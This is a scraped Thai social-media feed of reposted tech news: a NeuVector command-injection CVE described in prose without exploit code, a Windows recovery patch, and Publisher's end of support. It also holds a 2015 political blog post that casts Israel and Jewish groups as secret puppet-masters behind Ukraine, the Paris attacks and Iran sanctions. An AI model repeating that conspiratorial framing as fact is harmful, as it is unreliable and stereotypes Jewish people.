    เตือนผู้ใช้ให้ตรวจสอบ container ที่มีสิทธิ์สูง

    https://securityonline.info/critical-neuvector-rce-flaw-cve-2025-54469-cvss-10-0-allows-command-injection-via-unsanitized-environment-variables/
    🚨 “ช่องโหว่ CVE-2025-54469 ใน NeuVector – เสี่ยง RCE ระดับสูงสุด! แฮกเกอร์อาจสั่งรันคำสั่งในคอนเทนเนอร์ได้ทันที” SUSE Rancher Security ออกประกาศเตือนช่องโหว่ร้ายแรงใน NeuVector ซึ่งเป็นแพลตฟอร์มรักษาความปลอดภัยสำหรับ container โดยช่องโหว่นี้มีรหัสว่า CVE-2025-54469 และได้คะแนน CVSS เต็ม 10.0 หมายถึงความรุนแรงระดับสูงสุด ช่องโหว่นี้เกิดจากการที่ Enforcer container ใช้ environment variables ชื่อ CLUSTER_RPC_PORT และ CLUSTER_LAN_PORT เพื่อสร้างคำสั่ง shell ผ่านฟังก์ชัน popen() โดยไม่มีการตรวจสอบหรือ sanitize ค่าที่รับเข้ามาเลย ทำให้แฮกเกอร์สามารถ inject คำสั่งอันตรายเข้าไปได้โดยตรง เมื่อ Enforcer หยุดทำงาน มันจะตรวจสอบสถานะของ subprocess เช่น Consul โดยรันคำสั่ง shell ที่ประกอบจาก environment variables เหล่านี้ หากแฮกเกอร์สามารถควบคุมค่าตัวแปรได้ ก็สามารถสั่งรันคำสั่งใด ๆ ในระบบได้ทันที ผลกระทบคือแฮกเกอร์อาจได้สิทธิ์ root ภายใน container, เคลื่อนไหวไปยัง container อื่นใน Kubernetes cluster, หรือแม้แต่ปิดระบบ runtime security enforcement ของ NeuVector ได้เลย SUSE ได้ออกแพตช์ในเวอร์ชัน NeuVector v5.4.7 ซึ่งมีการตรวจสอบค่าตัวแปรก่อนนำไปใช้ในคำสั่ง shell แล้ว ผู้ใช้ควรอัปเดตทันทีเพื่อป้องกันการโจมตี ✅ รายละเอียดช่องโหว่ CVE-2025-54469 ➡️ เกิดจากการใช้ environment variables โดยไม่ sanitize ➡️ ใช้ในคำสั่ง shell ผ่านฟังก์ชัน popen() ➡️ ส่งผลให้เกิด command injection ได้ ➡️ อยู่ใน Enforcer container ของ NeuVector ➡️ ได้คะแนน CVSS เต็ม 10.0 ✅ ผลกระทบจากช่องโหว่ ➡️ แฮกเกอร์อาจได้สิทธิ์ root ภายใน container ➡️ เคลื่อนไหวไปยัง container อื่นใน cluster ได้ ➡️ ปิดระบบ runtime security enforcement ของ NeuVector ➡️ อาจนำไปสู่การโจมตีระดับ cluster-wide ➡️ เสี่ยงต่อการถูกยึดระบบ DevSecOps ทั้งชุด ✅ การตอบสนองจาก SUSE ➡️ ออกแพตช์ใน NeuVector v5.4.7 ➡️ เพิ่มการตรวจสอบค่าตัวแปรก่อนใช้ใน shell command ➡️ แนะนำให้อัปเดตทันทีเพื่อป้องกันการโจมตี ➡️ เตือนผู้ใช้ให้ตรวจสอบ container ที่มีสิทธิ์สูง https://securityonline.info/critical-neuvector-rce-flaw-cve-2025-54469-cvss-10-0-allows-command-injection-via-unsanitized-environment-variables/
    SECURITYONLINE.INFO
    Critical NeuVector RCE Flaw (CVE-2025-54469, CVSS 10.0) Allows Command Injection via Unsanitized Environment Variables
    SUSE patched a Critical RCE flaw (CVE-2025-54469, CVSS 10.0) in NeuVector Enforcer that allows attackers to inject commands via unsanitized environment variables, risking container root shell access.
    0 Comments 0 Shares 77 Views 0 Reviews
  • “Microsoft รีบปล่อยแพตช์ฉุกเฉิน KB5070773 หลังอัปเดตพัง WinRE – คีย์บอร์ดและเมาส์ USB ใช้ไม่ได้ในโหมดกู้คืน”

    Microsoft ต้องรีบออกแพตช์ฉุกเฉิน KB5070773 เพื่อแก้ปัญหาที่เกิดจากอัปเดต KB5066835 ซึ่งปล่อยออกมาเมื่อ 14 ตุลาคม 2025 โดยอัปเดตนั้นทำให้ระบบ Windows Recovery Environment (WinRE) บน Windows 11 เวอร์ชัน 24H2 และ 25H2 ไม่สามารถใช้งานคีย์บอร์ดและเมาส์แบบ USB ได้เลย

    ปัญหานี้ร้ายแรงกว่าที่คิด เพราะ WinRE คือเครื่องมือหลักในการกู้คืนระบบ เช่น Startup Repair หรือ Reset This PC ถ้าอุปกรณ์อินพุตใช้ไม่ได้ ก็เท่ากับว่าผู้ใช้ไม่สามารถกู้ระบบได้เลย โดยเฉพาะในกรณีที่เครื่องบูตไม่ขึ้น

    สำหรับผู้ที่ยังสามารถเข้าสู่ระบบ Windows ได้ แค่ติดตั้งแพตช์ KB5070773 ผ่าน Windows Update แล้วรีบูตเครื่องก็จะใช้งานได้ตามปกติ แต่ถ้าระบบเข้าไม่ได้เลย Microsoft แนะนำให้ใช้หน้าจอสัมผัส, พอร์ต PS/2 (ถ้ามี), หรือ USB recovery drive แทน

    นี่เป็นครั้งที่สองในรอบไม่กี่เดือนที่ WinRE มีปัญหาใหญ่ เพราะในเดือนสิงหาคมก็เคยมีอัปเดตด้านความปลอดภัยที่ทำให้ฟีเจอร์ Reset This PC ใช้งานไม่ได้เช่นกัน ซึ่งทำให้หลายคนเริ่มตั้งคำถามถึงคุณภาพของการทดสอบก่อนปล่อยอัปเดตของ Microsoft

    รายละเอียดแพตช์ KB5070773
    แก้ปัญหา USB keyboard และ mouse ใช้ไม่ได้ใน WinRE
    ส่งผลกระทบกับ Windows 11 เวอร์ชัน 24H2 และ 25H2
    ปัญหาเกิดจากอัปเดต KB5066835 เมื่อ 14 ตุลาคม 2025
    แพตช์ใหม่สามารถติดตั้งผ่าน Windows Update ได้ทันที
    แก้ไขรวมอยู่ใน rollup ถัดไปสำหรับผู้ที่พลาดแพตช์ฉุกเฉิน

    ผลกระทบและคำแนะนำ
    ผู้ใช้ที่เข้า Windows ได้ควรติดตั้งแพตช์ทันที
    ผู้ที่ติดอยู่ใน recovery loop ต้องใช้ touchscreen, PS/2 หรือ USB recovery drive
    องค์กรสามารถใช้ Preboot Execution Environment (PXE) ผ่าน Configuration Manager

    บริบทและความน่ากังวล
    เป็นปัญหา WinRE ครั้งที่สองในรอบ 2 เดือน
    ครั้งก่อนในเดือนสิงหาคมทำให้ Reset This PC ใช้งานไม่ได้
    สะท้อนความเปราะบางของระบบอัปเดต Windows
    Microsoft ยังไม่อธิบายว่าบั๊กนี้หลุดจากการทดสอบได้อย่างไร

    https://www.tomshardware.com/software/windows/microsoft-rushes-out-emergency-windows-11-patch
    🛠️ “Microsoft รีบปล่อยแพตช์ฉุกเฉิน KB5070773 หลังอัปเดตพัง WinRE – คีย์บอร์ดและเมาส์ USB ใช้ไม่ได้ในโหมดกู้คืน” Microsoft ต้องรีบออกแพตช์ฉุกเฉิน KB5070773 เพื่อแก้ปัญหาที่เกิดจากอัปเดต KB5066835 ซึ่งปล่อยออกมาเมื่อ 14 ตุลาคม 2025 โดยอัปเดตนั้นทำให้ระบบ Windows Recovery Environment (WinRE) บน Windows 11 เวอร์ชัน 24H2 และ 25H2 ไม่สามารถใช้งานคีย์บอร์ดและเมาส์แบบ USB ได้เลย ปัญหานี้ร้ายแรงกว่าที่คิด เพราะ WinRE คือเครื่องมือหลักในการกู้คืนระบบ เช่น Startup Repair หรือ Reset This PC ถ้าอุปกรณ์อินพุตใช้ไม่ได้ ก็เท่ากับว่าผู้ใช้ไม่สามารถกู้ระบบได้เลย โดยเฉพาะในกรณีที่เครื่องบูตไม่ขึ้น สำหรับผู้ที่ยังสามารถเข้าสู่ระบบ Windows ได้ แค่ติดตั้งแพตช์ KB5070773 ผ่าน Windows Update แล้วรีบูตเครื่องก็จะใช้งานได้ตามปกติ แต่ถ้าระบบเข้าไม่ได้เลย Microsoft แนะนำให้ใช้หน้าจอสัมผัส, พอร์ต PS/2 (ถ้ามี), หรือ USB recovery drive แทน นี่เป็นครั้งที่สองในรอบไม่กี่เดือนที่ WinRE มีปัญหาใหญ่ เพราะในเดือนสิงหาคมก็เคยมีอัปเดตด้านความปลอดภัยที่ทำให้ฟีเจอร์ Reset This PC ใช้งานไม่ได้เช่นกัน ซึ่งทำให้หลายคนเริ่มตั้งคำถามถึงคุณภาพของการทดสอบก่อนปล่อยอัปเดตของ Microsoft ✅ รายละเอียดแพตช์ KB5070773 ➡️ แก้ปัญหา USB keyboard และ mouse ใช้ไม่ได้ใน WinRE ➡️ ส่งผลกระทบกับ Windows 11 เวอร์ชัน 24H2 และ 25H2 ➡️ ปัญหาเกิดจากอัปเดต KB5066835 เมื่อ 14 ตุลาคม 2025 ➡️ แพตช์ใหม่สามารถติดตั้งผ่าน Windows Update ได้ทันที ➡️ แก้ไขรวมอยู่ใน rollup ถัดไปสำหรับผู้ที่พลาดแพตช์ฉุกเฉิน ✅ ผลกระทบและคำแนะนำ ➡️ ผู้ใช้ที่เข้า Windows ได้ควรติดตั้งแพตช์ทันที ➡️ ผู้ที่ติดอยู่ใน recovery loop ต้องใช้ touchscreen, PS/2 หรือ USB recovery drive ➡️ องค์กรสามารถใช้ Preboot Execution Environment (PXE) ผ่าน Configuration Manager ✅ บริบทและความน่ากังวล ➡️ เป็นปัญหา WinRE ครั้งที่สองในรอบ 2 เดือน ➡️ ครั้งก่อนในเดือนสิงหาคมทำให้ Reset This PC ใช้งานไม่ได้ ➡️ สะท้อนความเปราะบางของระบบอัปเดต Windows ➡️ Microsoft ยังไม่อธิบายว่าบั๊กนี้หลุดจากการทดสอบได้อย่างไร https://www.tomshardware.com/software/windows/microsoft-rushes-out-emergency-windows-11-patch
    0 Comments 0 Shares 77 Views 0 Reviews
  • มทร.ล้านนา จับมือ สสปท. ยกระดับมาตรฐาน SHE เตรียมความพร้อมนักศึกษา ก่อนเข้าสู่ตลาดแรงงานอย่างปลอดภัย
    https://www.thai-tai.tv/news/22010/
    .
    #ไทยไท #มทรล้านนา #สสปท #ความปลอดภัยในการทำงาน #อาชีวอนามัย #SHE

    มทร.ล้านนา จับมือ สสปท. ยกระดับมาตรฐาน SHE เตรียมความพร้อมนักศึกษา ก่อนเข้าสู่ตลาดแรงงานอย่างปลอดภัย https://www.thai-tai.tv/news/22010/ . #ไทยไท #มทรล้านนา #สสปท #ความปลอดภัยในการทำงาน #อาชีวอนามัย #SHE
    0 Comments 0 Shares 47 Views 0 Reviews
  • ทำหน้าที่ ขุดคุ้ย สอดส่อง ฉวยโฉบเอกสาร แต่ถ้าใครคิดว่าแบนี้อิหร่านคงโป๊ไม่เหลือ เรียกว่ายังไม่รู้จักอิหร่านจริง!

    แล้วก็เป็นไปตามคาด การเจรจาไม่เป็นผล ตกลงกันไม่ได้ วันสิ้นสุดการเจรจา ต้องมีการต่ออายุไปถึงกลางปี 2015 แสดงว่า อิสราเอลยังทำภาระกิจไม่สำเร็จ ระหว่างนี้หากมีการเปลี่ยนค่าย เปลี่ยนพฤติกรรม พวกซุ่มเงียบเปลี่ยนใจเปิดตัว อิสราเอลจะเอาอยู่ไหม น้ำมันในตะวันออกกลาง ยังเป็นของรัก ของหวง ของนักล่าใบตองแห้งและพวก โดยเฉพาะลูกพี่ชาวเกาะใหญ่เท่าปลายนิ้วก้อยฯ ที่กบไต๋เงียบกริบ และใช้นักล่า ออกหน้าแทน… อย่างเคย

    จะเห็นว่าอิสราเอล กำลังเล่นบทหนัก ในการหนุน หรือ ผลักดัน การขยับหมากของนักล่าใบตองแห้ง นอกจากนี้ อิสราเอลยังมีเป้าหมาย ลับลึกซ่อนอยู่อีกหลายเรื่อง

    ถ้าสังเกตกัน จะเห็นว่า อิสราเอล พยายามเน้นให้เหตุการณ์ที่เกิดขึ้นที่ฝรั่งเศส เป็นเรื่องการรังแกยิว โดยนาย Liberman รัฐมนตรีต่างประเทศของอิสราเอล ซึ่งไปเดินแถวคล้องแขนที่ปารีสด้วย บอกว่า เขาดู CNN แล้ว ปรากฏว่า ไม่มีการเสนอข่าวในมุมของชาวยิวเลยนะ เช่น ซูเปอร์มาร์เก็ต Kosher ที่ยิงกัน ก็เป็นของชาวยิว หรือ พวกตัวประกัน ก็เป็นพวกชาวยิว พร้อมพูดว่า
    ” เราควรต้องพูดกันอย่างซื่อสัตย์ ไม่ต้องอาย และ เอาทุกอย่างวางบนโต๊ะ เพราะที่มาของการฆาตกรรมหมู่ชาวยิว มาจากมุสลิมเคร่งจัดด้านหนึ่ง และการด่าชาวยิวอย่างรุนแรงและไม่มีเหตุผลอีกด้านหนึ่ง”

    นี่ก็เป็นการให้ข่าวแบบกาฝาก คราวนี้ฝากไปให้ใคร

    ฝรั่งเศส มีชาวยิวอาศัยอยู่จำนวนมาก ไม่ต่ำกว่า 6 แสนคน นับเป็นอันดับ 3 ในโลก รองจากอิสราเอล และอเมริกา และฝรั่งเศส อีกเช่นเดียวกัน ที่มีคนนับถืออิสลามอาศัยอยู่มากที่สุดในยุโรป มีจำนวนไม่น้อยกว่า 4.7 ล้านคน ถึง 7.7 ล้านคน แล้วแต่แหล่งที่มาของข้อมูล

    ยูเครน ที่กำลังเล่นกันจนเละ จะกลายเป็นโรงละครสัตว์อยู่แล้วนั้น อิสราเอลก็แอบสนับสนุนฝ่ายที่ต่อสู้กับคุณพี่ปูตินอย่างเงียบ เชียบ แต่แข็งขัน อย่าลืมว่า คุณนาย Nuland นางเหยี่ยวของอเมริกา เจ้าของวลีเด็ด **** EU เป็นคนเลือกนาย Yatsenyuk ยิวหนุ่ม ไปเป็นนายกรัฐมนตรียูเครน ยูเครนจึง ไม่ได้เป็นเพียงสนามชิงท่อส่งแก๊ส มีหลายฝ่าย แอบหวังที่จะเอายูเครน เป็นบ้านยิวสาขา 2

    ฝรั่งเศสจึงน่าสนใจ ที่จะใช้เป็นสนามทดลอง หรือห้องทดลอง ทฤษฏีต่างๆ ก่อนมีการปฏิบัติการณ์ของจริง เพื่อดูปฏิกริยา การโต้ตอบ และกำลังสนับสนุนของแต่ละฝ่าย

    ในการทำศึกสงคราม แต่ละฝ่าย ต่างมียุทธศาสตร์ และต่างมีวาระซ่อนเร้น ซึ่งเราอาจจะยังเห็นไม่หมด มองไม่ชัดในตอนนี้ เพราะพวกเขาคงจะยังไม่เปิดฉากแสดงกันที่สถานที่จริง หรือถ้าเปิด มันก็ดูเป็นฉาก ที่ไม่ต่อเนื่องกัน

    เช่นเรื่องยูเครนกับตะวันออกกลาง อาจเกี่ยวโยงกันอย่างที่เรานึกไม่ถึง และเช่นเดียวกับการลงมติ คว่ำบาตรรัสเซีย ที่กลุ่มประเทศในสหภาพยุโรป กำลังทดสอบความแข็งของข้อกัน และคงจะรู้กันเร็วๆนี้ ว่า ใครกันแน่ ที่ข้อแข็งในสหภาพยุโรป

    ส่วนเรื่องการคว่ำบาตรอิหร่าน ซึ่งสมาชิกรัฐสภาอเมริกันกลุ่มหนึ่ง กำลังกระเหี้ยน กระหือรือ ที่จะยื่นเรื่องให้รัฐสภา ลงมติเพิ่มการคว่ำบาตรอิหร่านเพิ่ม ทั้งที่การเจรจาเรื่องพัฒนานิวเคลียร์ ที่เพิ่งเริ่ม หลังจากมีการต่ออายุใหม่ และมีข่าวว่า นายโอบามาบอกว่า พยายามจะใช้สิทธิวีโต้ เพราะการเจรจากับอิหร่านยังไปได้อยู่

    คงจะไม่เป็นเรื่องน่าแปลกใจ ถ้าการพยายามคว่ำบาตรอิหร่านเพิ่มนั้น ได้รับการสนับสนุนจากกลุ่มยิว ทั้งใน และนอกอเมริกา ถ้าอิหร่านล้มคว่ำตามบาตรในตะวันออกกลาง ที่จะลุกขึ้นตีปีกคืออิสราเอล เพราะถ้าเจอทั้งอิหร่าน และตุรกี พร้อมกัน ในตะวันออกกลาง มันเหนื่อยโว้ย สะกัดไปทีละประเทศ น่าจะดีกว่า ส่วนความฝันเรื่องยูเครน ถ้ารัสเซียหมดแรง ถอบฉากเลิกขวาง อิสราเอลก็หวานคอ เอะ นี่ตกลงเป็นเรื่องของยิวล้วนๆหรือไง แล้วพวกลูกพี่ ทั้งนักล่าใบตองแห้ง และชาวเกาะใหญ่เท่าปลายนิ้วก้อยฯ ที่คอยกำกับ ทุกรายการ ยังต้องการให้จัดการเรื่องอะไรอีกครับ ?!

    สวัสดีครับ
    คนเล่านิทาน
    18 มค. 2558
    ทำหน้าที่ ขุดคุ้ย สอดส่อง ฉวยโฉบเอกสาร แต่ถ้าใครคิดว่าแบนี้อิหร่านคงโป๊ไม่เหลือ เรียกว่ายังไม่รู้จักอิหร่านจริง! แล้วก็เป็นไปตามคาด การเจรจาไม่เป็นผล ตกลงกันไม่ได้ วันสิ้นสุดการเจรจา ต้องมีการต่ออายุไปถึงกลางปี 2015 แสดงว่า อิสราเอลยังทำภาระกิจไม่สำเร็จ ระหว่างนี้หากมีการเปลี่ยนค่าย เปลี่ยนพฤติกรรม พวกซุ่มเงียบเปลี่ยนใจเปิดตัว อิสราเอลจะเอาอยู่ไหม น้ำมันในตะวันออกกลาง ยังเป็นของรัก ของหวง ของนักล่าใบตองแห้งและพวก โดยเฉพาะลูกพี่ชาวเกาะใหญ่เท่าปลายนิ้วก้อยฯ ที่กบไต๋เงียบกริบ และใช้นักล่า ออกหน้าแทน… อย่างเคย จะเห็นว่าอิสราเอล กำลังเล่นบทหนัก ในการหนุน หรือ ผลักดัน การขยับหมากของนักล่าใบตองแห้ง นอกจากนี้ อิสราเอลยังมีเป้าหมาย ลับลึกซ่อนอยู่อีกหลายเรื่อง ถ้าสังเกตกัน จะเห็นว่า อิสราเอล พยายามเน้นให้เหตุการณ์ที่เกิดขึ้นที่ฝรั่งเศส เป็นเรื่องการรังแกยิว โดยนาย Liberman รัฐมนตรีต่างประเทศของอิสราเอล ซึ่งไปเดินแถวคล้องแขนที่ปารีสด้วย บอกว่า เขาดู CNN แล้ว ปรากฏว่า ไม่มีการเสนอข่าวในมุมของชาวยิวเลยนะ เช่น ซูเปอร์มาร์เก็ต Kosher ที่ยิงกัน ก็เป็นของชาวยิว หรือ พวกตัวประกัน ก็เป็นพวกชาวยิว พร้อมพูดว่า ” เราควรต้องพูดกันอย่างซื่อสัตย์ ไม่ต้องอาย และ เอาทุกอย่างวางบนโต๊ะ เพราะที่มาของการฆาตกรรมหมู่ชาวยิว มาจากมุสลิมเคร่งจัดด้านหนึ่ง และการด่าชาวยิวอย่างรุนแรงและไม่มีเหตุผลอีกด้านหนึ่ง” นี่ก็เป็นการให้ข่าวแบบกาฝาก คราวนี้ฝากไปให้ใคร ฝรั่งเศส มีชาวยิวอาศัยอยู่จำนวนมาก ไม่ต่ำกว่า 6 แสนคน นับเป็นอันดับ 3 ในโลก รองจากอิสราเอล และอเมริกา และฝรั่งเศส อีกเช่นเดียวกัน ที่มีคนนับถืออิสลามอาศัยอยู่มากที่สุดในยุโรป มีจำนวนไม่น้อยกว่า 4.7 ล้านคน ถึง 7.7 ล้านคน แล้วแต่แหล่งที่มาของข้อมูล ยูเครน ที่กำลังเล่นกันจนเละ จะกลายเป็นโรงละครสัตว์อยู่แล้วนั้น อิสราเอลก็แอบสนับสนุนฝ่ายที่ต่อสู้กับคุณพี่ปูตินอย่างเงียบ เชียบ แต่แข็งขัน อย่าลืมว่า คุณนาย Nuland นางเหยี่ยวของอเมริกา เจ้าของวลีเด็ด Fuck EU เป็นคนเลือกนาย Yatsenyuk ยิวหนุ่ม ไปเป็นนายกรัฐมนตรียูเครน ยูเครนจึง ไม่ได้เป็นเพียงสนามชิงท่อส่งแก๊ส มีหลายฝ่าย แอบหวังที่จะเอายูเครน เป็นบ้านยิวสาขา 2 ฝรั่งเศสจึงน่าสนใจ ที่จะใช้เป็นสนามทดลอง หรือห้องทดลอง ทฤษฏีต่างๆ ก่อนมีการปฏิบัติการณ์ของจริง เพื่อดูปฏิกริยา การโต้ตอบ และกำลังสนับสนุนของแต่ละฝ่าย ในการทำศึกสงคราม แต่ละฝ่าย ต่างมียุทธศาสตร์ และต่างมีวาระซ่อนเร้น ซึ่งเราอาจจะยังเห็นไม่หมด มองไม่ชัดในตอนนี้ เพราะพวกเขาคงจะยังไม่เปิดฉากแสดงกันที่สถานที่จริง หรือถ้าเปิด มันก็ดูเป็นฉาก ที่ไม่ต่อเนื่องกัน เช่นเรื่องยูเครนกับตะวันออกกลาง อาจเกี่ยวโยงกันอย่างที่เรานึกไม่ถึง และเช่นเดียวกับการลงมติ คว่ำบาตรรัสเซีย ที่กลุ่มประเทศในสหภาพยุโรป กำลังทดสอบความแข็งของข้อกัน และคงจะรู้กันเร็วๆนี้ ว่า ใครกันแน่ ที่ข้อแข็งในสหภาพยุโรป ส่วนเรื่องการคว่ำบาตรอิหร่าน ซึ่งสมาชิกรัฐสภาอเมริกันกลุ่มหนึ่ง กำลังกระเหี้ยน กระหือรือ ที่จะยื่นเรื่องให้รัฐสภา ลงมติเพิ่มการคว่ำบาตรอิหร่านเพิ่ม ทั้งที่การเจรจาเรื่องพัฒนานิวเคลียร์ ที่เพิ่งเริ่ม หลังจากมีการต่ออายุใหม่ และมีข่าวว่า นายโอบามาบอกว่า พยายามจะใช้สิทธิวีโต้ เพราะการเจรจากับอิหร่านยังไปได้อยู่ คงจะไม่เป็นเรื่องน่าแปลกใจ ถ้าการพยายามคว่ำบาตรอิหร่านเพิ่มนั้น ได้รับการสนับสนุนจากกลุ่มยิว ทั้งใน และนอกอเมริกา ถ้าอิหร่านล้มคว่ำตามบาตรในตะวันออกกลาง ที่จะลุกขึ้นตีปีกคืออิสราเอล เพราะถ้าเจอทั้งอิหร่าน และตุรกี พร้อมกัน ในตะวันออกกลาง มันเหนื่อยโว้ย สะกัดไปทีละประเทศ น่าจะดีกว่า ส่วนความฝันเรื่องยูเครน ถ้ารัสเซียหมดแรง ถอบฉากเลิกขวาง อิสราเอลก็หวานคอ เอะ นี่ตกลงเป็นเรื่องของยิวล้วนๆหรือไง แล้วพวกลูกพี่ ทั้งนักล่าใบตองแห้ง และชาวเกาะใหญ่เท่าปลายนิ้วก้อยฯ ที่คอยกำกับ ทุกรายการ ยังต้องการให้จัดการเรื่องอะไรอีกครับ ?! สวัสดีครับ คนเล่านิทาน 18 มค. 2558
    0 Comments 0 Shares 165 Views 0 Reviews
  • “Microsoft Publisher จะสิ้นสุดการสนับสนุนในเดือนตุลาคม 2026 — ปิดตำนานเครื่องมือออกแบบยุค 90” — เมื่อแอปสร้างใบปลิวและจดหมายข่าวที่เคยอยู่ในทุกบ้านกำลังจะอำลาอย่างถาวร

    Microsoft ประกาศว่าจะยุติการสนับสนุนแอป Publisher อย่างเป็นทางการในเดือนตุลาคม 2026 ซึ่งตรงกับวันหมดอายุของ Office LTSC 2021 โดยหลังจากวันนั้น Publisher จะถูกถอดออกจาก Microsoft 365 และไม่สามารถติดตั้งหรือเปิดไฟล์ .pub ได้อีกต่อไปในเวอร์ชันใหม่

    Publisher เปิดตัวครั้งแรกในปี 1991 เพื่อให้ผู้ใช้ทั่วไปสามารถออกแบบสิ่งพิมพ์ เช่น ใบปลิว, โบรชัวร์, จดหมายข่าว โดยไม่ต้องใช้โปรแกรมระดับมืออาชีพอย่าง QuarkXPress หรือ Adobe InDesign ด้วยราคาที่เข้าถึงได้และการใช้งานง่าย ทำให้ Publisher กลายเป็นเครื่องมือยอดนิยมในโรงเรียน, ธุรกิจขนาดเล็ก และผู้ใช้ตามบ้าน

    แม้จะไม่เคยครองใจนักออกแบบมืออาชีพ แต่ Publisher ก็มีบทบาทสำคัญในการ “ประชาธิปไตยด้านการออกแบบ” โดยเปิดโอกาสให้ทุกคนสามารถสร้างสื่อสิ่งพิมพ์ได้ด้วยตัวเอง

    หลังจากการยุติการสนับสนุน Microsoft แนะนำให้ผู้ใช้แปลงไฟล์ .pub เป็น PDF เพื่อเก็บไว้ดู และหากต้องการแก้ไข ให้เปิด PDF ใน Word — แม้ว่าการจัดวางอาจเพี้ยน โดยเฉพาะไฟล์ที่มีกราฟิกจำนวนมาก

    สำหรับผู้ใช้ที่ต้องการทางเลือกใหม่ Microsoft แนะนำให้ใช้ Word, PowerPoint หรือแอป Designer แทน ส่วนทางเลือกจากภายนอกก็มีเช่น:

    Canva — ใช้งานง่าย มีเทมเพลตหลากหลาย แต่ฟีเจอร์เต็มต้องสมัครสมาชิก
    LibreOffice Draw — ฟรีและโอเพ่นซอร์ส รองรับไฟล์ .pub ได้พอสมควร
    Affinity Publisher 2 — ซื้อครั้งเดียว ไม่มีรายเดือน เหมาะกับผู้ใช้จริงจัง

    Microsoft Publisher จะสิ้นสุดการสนับสนุนในเดือนตุลาคม 2026
    ตรงกับวันหมดอายุของ Office LTSC 2021

    Publisher จะถูกถอดออกจาก Microsoft 365
    ไม่สามารถติดตั้งหรือเปิดไฟล์ .pub ได้อีก

    Publisher เปิดตัวในปี 1991 และรวมอยู่ใน Office ตั้งแต่เวอร์ชัน 97
    เคยเป็นเครื่องมือออกแบบยอดนิยมสำหรับผู้ใช้ทั่วไป

    Microsoft แนะนำให้แปลงไฟล์ .pub เป็น PDF เพื่อเก็บไว้ดู
    และเปิด PDF ใน Word หากต้องการแก้ไข

    ทางเลือกใหม่จาก Microsoft ได้แก่ Word, PowerPoint และ Designer
    ใช้แทน Publisher สำหรับงานออกแบบทั่วไป

    ทางเลือกจากภายนอก ได้แก่ Canva, LibreOffice Draw, Affinity Publisher 2
    มีทั้งแบบฟรีและเสียเงินตามระดับความสามารถ

    https://www.slashgear.com/2001386/microsoft-ending-publisher-in-october-2026/
    📄 “Microsoft Publisher จะสิ้นสุดการสนับสนุนในเดือนตุลาคม 2026 — ปิดตำนานเครื่องมือออกแบบยุค 90” — เมื่อแอปสร้างใบปลิวและจดหมายข่าวที่เคยอยู่ในทุกบ้านกำลังจะอำลาอย่างถาวร Microsoft ประกาศว่าจะยุติการสนับสนุนแอป Publisher อย่างเป็นทางการในเดือนตุลาคม 2026 ซึ่งตรงกับวันหมดอายุของ Office LTSC 2021 โดยหลังจากวันนั้น Publisher จะถูกถอดออกจาก Microsoft 365 และไม่สามารถติดตั้งหรือเปิดไฟล์ .pub ได้อีกต่อไปในเวอร์ชันใหม่ Publisher เปิดตัวครั้งแรกในปี 1991 เพื่อให้ผู้ใช้ทั่วไปสามารถออกแบบสิ่งพิมพ์ เช่น ใบปลิว, โบรชัวร์, จดหมายข่าว โดยไม่ต้องใช้โปรแกรมระดับมืออาชีพอย่าง QuarkXPress หรือ Adobe InDesign ด้วยราคาที่เข้าถึงได้และการใช้งานง่าย ทำให้ Publisher กลายเป็นเครื่องมือยอดนิยมในโรงเรียน, ธุรกิจขนาดเล็ก และผู้ใช้ตามบ้าน แม้จะไม่เคยครองใจนักออกแบบมืออาชีพ แต่ Publisher ก็มีบทบาทสำคัญในการ “ประชาธิปไตยด้านการออกแบบ” โดยเปิดโอกาสให้ทุกคนสามารถสร้างสื่อสิ่งพิมพ์ได้ด้วยตัวเอง หลังจากการยุติการสนับสนุน Microsoft แนะนำให้ผู้ใช้แปลงไฟล์ .pub เป็น PDF เพื่อเก็บไว้ดู และหากต้องการแก้ไข ให้เปิด PDF ใน Word — แม้ว่าการจัดวางอาจเพี้ยน โดยเฉพาะไฟล์ที่มีกราฟิกจำนวนมาก สำหรับผู้ใช้ที่ต้องการทางเลือกใหม่ Microsoft แนะนำให้ใช้ Word, PowerPoint หรือแอป Designer แทน ส่วนทางเลือกจากภายนอกก็มีเช่น: 📐 Canva — ใช้งานง่าย มีเทมเพลตหลากหลาย แต่ฟีเจอร์เต็มต้องสมัครสมาชิก 📐 LibreOffice Draw — ฟรีและโอเพ่นซอร์ส รองรับไฟล์ .pub ได้พอสมควร 📐 Affinity Publisher 2 — ซื้อครั้งเดียว ไม่มีรายเดือน เหมาะกับผู้ใช้จริงจัง ✅ Microsoft Publisher จะสิ้นสุดการสนับสนุนในเดือนตุลาคม 2026 ➡️ ตรงกับวันหมดอายุของ Office LTSC 2021 ✅ Publisher จะถูกถอดออกจาก Microsoft 365 ➡️ ไม่สามารถติดตั้งหรือเปิดไฟล์ .pub ได้อีก ✅ Publisher เปิดตัวในปี 1991 และรวมอยู่ใน Office ตั้งแต่เวอร์ชัน 97 ➡️ เคยเป็นเครื่องมือออกแบบยอดนิยมสำหรับผู้ใช้ทั่วไป ✅ Microsoft แนะนำให้แปลงไฟล์ .pub เป็น PDF เพื่อเก็บไว้ดู ➡️ และเปิด PDF ใน Word หากต้องการแก้ไข ✅ ทางเลือกใหม่จาก Microsoft ได้แก่ Word, PowerPoint และ Designer ➡️ ใช้แทน Publisher สำหรับงานออกแบบทั่วไป ✅ ทางเลือกจากภายนอก ได้แก่ Canva, LibreOffice Draw, Affinity Publisher 2 ➡️ มีทั้งแบบฟรีและเสียเงินตามระดับความสามารถ https://www.slashgear.com/2001386/microsoft-ending-publisher-in-october-2026/
    WWW.SLASHGEAR.COM
    Microsoft Will Be Ending Support For This Popular Software In October 2026 - SlashGear
    Microsoft Publisher will reach end-of-support in October 2026 -- Microsoft will drop updates and remove it from Microsoft 365 apps.
    0 Comments 0 Shares 99 Views 0 Reviews
  • “ProtonMail จัดการอีเมลข่าวสารได้ดีกว่า Gmail — สะดวกกว่า ลึกกว่า และเป็นส่วนตัวมากกว่า” — เมื่อการจัดการ newsletter ไม่ใช่แค่การกด unsubscribe แต่คือการควบคุมข้อมูลของคุณ

    บทความจาก It’s FOSS โดย Abhishek เล่าประสบการณ์ตรงจากการใช้ ProtonMail มานานกว่า 5 ปี โดยเปรียบเทียบฟีเจอร์จัดการอีเมลข่าวสาร (newsletter) ระหว่าง ProtonMail กับ Gmail ซึ่งแม้ทั้งสองจะมีฟีเจอร์คล้ายกัน แต่ ProtonMail กลับทำได้ดีกว่าในหลายด้าน

